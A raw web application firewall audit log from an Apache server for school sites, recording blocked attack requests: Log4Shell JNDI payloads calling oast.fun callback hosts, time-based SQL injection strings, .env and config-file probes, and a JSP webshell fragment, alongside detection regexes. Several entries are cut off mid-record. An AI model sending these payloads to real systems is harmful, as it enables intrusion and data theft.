"/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747859930111685 5329 (- - -) Stopwatch2: 1747859930111685 5329; combined=3760, p1=385, p2=3337, p3=0, p4=0, p5=38, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25cc1223-Z-- --2ac17922-A-- [22/May/2025:03:59:33 +0700] aC4-tWfriXjg62qQwE_hHQAAAIs 103.236.140.4 46936 103.236.140.4 8181 --2ac17922-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.231.39.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.231.39.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ac17922-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ac17922-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861173818170 3576 (- - -) Stopwatch2: 1747861173818170 3576; combined=1571, p1=536, p2=1004, p3=0, p4=0, p5=31, sr=153, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ac17922-Z-- --1445521f-A-- [22/May/2025:04:04:26 +0700] aC4_2n0O04WKE1HJ5iT2wQAAAAc 103.236.140.4 47226 103.236.140.4 8181 --1445521f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 38.147.186.158 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 38.147.186.158 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1445521f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1445521f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861466980863 3492 (- - -) Stopwatch2: 1747861466980863 3492; combined=1540, p1=553, p2=956, p3=0, p4=0, p5=31, sr=135, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1445521f-Z-- --d1dc8938-A-- [22/May/2025:04:04:39 +0700] aC4_5-ThJmFSRJ5-OZdT9AAAAFA 103.236.140.4 47238 103.236.140.4 8181 --d1dc8938-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118238715 --d1dc8938-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d1dc8938-E-- --d1dc8938-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861479124231 2807 (- - -) Stopwatch2: 1747861479124231 2807; combined=1578, p1=406, p2=1144, p3=0, p4=0, p5=27, sr=122, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1dc8938-Z-- --c4980703-A-- [22/May/2025:04:04:39 +0700] aC4_5-ThJmFSRJ5-OZdT9gAAAFI 103.236.140.4 47268 103.236.140.4 8181 --c4980703-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0mbkqa4kqtm561jt3n039w8typjzpcgg.oast.fun} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0mbkqa4kqtm561jt3n0t6etx4t4gp3xr.oast.fun} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0mbkqa4kqtm561jt3n0w5rwpd89enspn.oast.fun} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0mbkqa4kqtm561jt3n0oxd4nwnd11n68.oast.fun} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0mbkqa4kqtm561jt3n051j63yw8f7hgy.oast.fun} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0mbkqa4kqtm561jt3n0pxcygp66f5zan.oast.fun} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0mbkqa4kqtm561jt3n04wws7fqkt7efu.oast.fun} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0mbkqa4kqtm561jt3n0kt83cgsk7u8zw.oast.fun} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0mbkqa4kqtm561jt3n0a7qyc64jipjj5.oast.fun} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0mbkqa4kqtm561jt3n0mubs4q4rifckm.oast.fun} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0mbkqa4kqtm561jt3n0somr9zthntwgm.oast.fun} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0mbkqa4kqtm561jt3n06d7eo1iaog79z.oast.fun} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0mbkqa4kqtm561jt3n0fk457exsmwekz.oast.fun} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0mbkqa4kqtm561jt3n0s7jjj8hriewcn.oast.fun} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0mbkqa4kqtm561jt3n0u3thgah7d81om.oast.fun}=${jndi:ldap://${hostName}.cookievalue.d0mbkqa4kqtm561jt3n0kxyyi3gh7z5me.oast.fun} X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 118238718 --c4980703-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c4980703-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747861479145871 5184 (- - -) Stopwatch2: 1747861479145871 5184; combined=3802, p1=369, p2=3382, p3=0, p4=0, p5=50, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c4980703-Z-- --83cdcf58-A-- [22/May/2025:04:09:30 +0700] aC5BCmfriXjg62qQwE_hUQAAAIk 103.236.140.4 47878 103.236.140.4 8181 --83cdcf58-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 168341481 --83cdcf58-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M ';waitfor delay '0:0:3'-- --ad74b702-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad74b702-E-- --ad74b702-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /services/userInfoWeb"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804377 3225 (- - -) Stopwatch2: 1747867294804377 3225; combined=1937, p1=470, p2=1448, p3=0, p4=0, p5=19, sr=182, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad74b702-Z-- --cc6d780f-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_iyQAAAIw 103.236.140.4 53712 103.236.140.4 8181 --cc6d780f-B-- POST /u9/OnLine/UMWebService.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 371 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/GetLogContent" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 164577495 --cc6d780f-C-- ../web.config --cc6d780f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc6d780f-H-- Message: Access denied with code 403 (phase 2). Matched phrase "Web.config" at XML. 
[file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: Web.config found within XML: web.config\x0a \x0a \x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804164 3885 (- - -) Stopwatch2: 1747867294804164 3885; combined=2380, p1=485, p2=1861, p3=0, p4=0, p5=33, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc6d780f-Z-- --31abb257-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_iywAAAI4 103.236.140.4 53720 103.236.140.4 8181 --31abb257-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168533974 --31abb257-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --31abb257-E-- --31abb257-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294805860 2417 (- - -) Stopwatch2: 1747867294805860 2417; combined=1388, p1=337, p2=1027, p3=0, p4=0, p5=24, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31abb257-Z-- --224d3a3f-A-- [22/May/2025:05:41:34 +0700] aC5WnuThJmFSRJ5-OZdV3AAAAFg 103.236.140.4 53702 103.236.140.4 8181 --224d3a3f-B-- POST /services/operOriztion HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 517 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: text/xml;charset=UTF-8 SOAPAction: "" X-Forwarded-For: 45.32.66.146, 103.236.140.4 Cookie: X-Varnish: 167870470 --224d3a3f-C-- ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))-- --224d3a3f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --224d3a3f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! 
?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')) found within MATCHED_VAR: ' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294804198 4742 (- - -) Stopwatch2: 1747867294804198 4742; combined=3294, p1=380, p2=2883, p3=0, p4=0, p5=31, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --224d3a3f-Z-- --8b62c14f-A-- [22/May/2025:05:41:34 +0700] aC5WnmfriXjg62qQwE_izAAAAI8 103.236.140.4 53750 103.236.140.4 8181 --8b62c14f-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+ HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Type: application/json Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168511164 --8b62c14f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8b62c14f-E-- --8b62c14f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:3%27--+"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294806681 3669 (- - -) Stopwatch2: 1747867294806681 3669; combined=2289, p1=473, p2=1769, p3=0, p4=0, p5=47, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b62c14f-Z-- --30c21846-A-- [22/May/2025:05:41:34 +0700] aC5Wniektx75wRFPQyh8XgAAANA 103.236.140.4 53788 103.236.140.4 8181 --30c21846-B-- POST /ufgovbank HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 157 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 159416386 --30c21846-C-- reqData= &signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest --30c21846-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30c21846-E-- --30c21846-H-- Message: Access denied with code 403 (phase 2). Pattern match "<\\!(doctype|entity)" at ARGS:reqData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "92"] [id "212860"] [rev "4"] [msg "COMODO WAF: XSS Attack Detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747867294807128 3527 (- - -) Stopwatch2: 1747867294807128 3527; combined=2134, p1=453, p2=1647, p3=0, p4=0, p5=33, sr=86, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30c21846-Z-- --e9048e40-A-- [22/May/2025:05:42:34 +0700] aC5W2mfriXjg62qQwE_i1AAAAIU 103.236.140.4 53864 103.236.140.4 8181 --e9048e40-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept-Charset: utf-8 --e9048e40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9048e40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747867354279374 875 (- - -) Stopwatch2: 1747867354279374 875; combined=379, p1=340, p2=0, p3=0, p4=0, p5=39, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9048e40-Z-- --b3e73e2a-A-- [22/May/2025:05:53:27 +0700] aC5ZZ2friXjg62qQwE_jFwAAAIg 103.236.140.4 54824 103.236.140.4 8181 --b3e73e2a-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.198 X-Forwarded-Proto: http Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --b3e73e2a-C-- --b3e73e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3e73e2a-E-- --b3e73e2a-H-- Message: Access denied with code 403 (phase 2). String match " --a7acec1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7acec1b-E-- --a7acec1b-H-- Message: Access denied with code 403 (phase 2). String match " --8eca8d46-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8eca8d46-E-- --8eca8d46-H-- Message: Access denied with code 403 (phase 2). String match " --f612384c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f612384c-H-- Message: Access denied with code 403 (phase 2). String match " --8c7a3021-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c7a3021-E-- --8c7a3021-H-- Message: Access denied with code 403 (phase 2). String match " --39569c70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39569c70-E-- --39569c70-H-- Message: Access denied with code 403 (phase 2). 
String match " --52b10d4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --52b10d4b-H-- Message: Access denied with code 403 (phase 2). String match " --e5c99232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5c99232-E-- --e5c99232-H-- Message: Access denied with code 403 (phase 2). String match " out.println("ilcuotvklp");new java.io.File(application.getRealPath(request.getServletPath())).delete(); --d3144b1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3144b1b-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:ws outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:ws=/../../0U9nv.jspx\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870300889087 2945 (- - -) Stopwatch2: 1747870300889087 2945; combined=1759, p1=364, p2=1367, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
